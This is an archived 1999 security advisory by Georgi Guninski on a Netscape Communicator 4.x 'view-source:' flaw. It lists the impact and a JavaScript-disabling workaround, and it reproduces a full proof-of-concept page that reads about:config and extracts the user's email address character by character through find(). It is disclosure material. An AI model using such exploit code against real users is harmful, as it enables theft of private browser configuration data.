TUCoPS :: Browsers :: nsview~1.txt

Netscape Communicator "view-source:" security vulnerabilities. 


[ http://www.rootshell.com/ ]

Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <joro@NAT.BG>
Subject: Netscape Communicator "view-source:" security vulnerabilities

There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07
Linux (probably all 4.x versions) in the way it works with
"view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source"
window. The problem is that it allows access to documents included in the
parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
allows reading the whole parsed document.

Vulnerabilites:

 Browsing local directories
 Reading user's cache
 Reading parsed HTML files
 Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
 Probably others

This vulnerability may be exploited by using HTML email message.

Workaround: Disable JavaScript
Netscape is notified about the problem.

Demonstration is available at: http://www.nat.bg/~joro/viewsource.html

Regards,
Georgi Guninski
 http://www.nat.bg/~joro
 http://www.whitehats.com/guninski
    [ Part 2: "Attached Text" ]

    [ The following text is in the "koi8-r" character set. ]
    [ Your display is set for the "US-ASCII" character set.  ]
    [ Some characters may be displayed incorrectly. ]

There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
allows reading the whole parsed document.
Vulnerabilites:

_________________________________________________________________________________________________________________________________

Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using HTML email message.

_________________________________________________________________________________________________________________________________

Workaround: Disable JavaScript

_________________________________________________________________________________________________________________________________

This demonstration tries to find your email address, it may take some time.

Written by Georgi Guninski

_________________________________________________________________________________________________________________________________

s="view-source:wysiwyg://1/javascript:s='vvvv&gt&&gt"" +"" +" blur();msg1=\"Your email is: \";
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"
" +"for(i=0;i'"; //a=window.open(s); location=s;


-----------------------------------------------------------------------------------------------------

<http://www.nat.bg/~joro/viewsource.html>

<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way 
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via 
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
 Browsing local directories<BR>
 Reading user's cache<BR>
 Reading parsed HTML files<BR>
 Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
 Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>

s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+"   t=res + String.fromCharCode(c);"
+"     if (find(t,true,true)) {"
+"      res=t;"
+"      if (c==32) i=charstoread+1"
+"     } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;


</SCRIPT>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH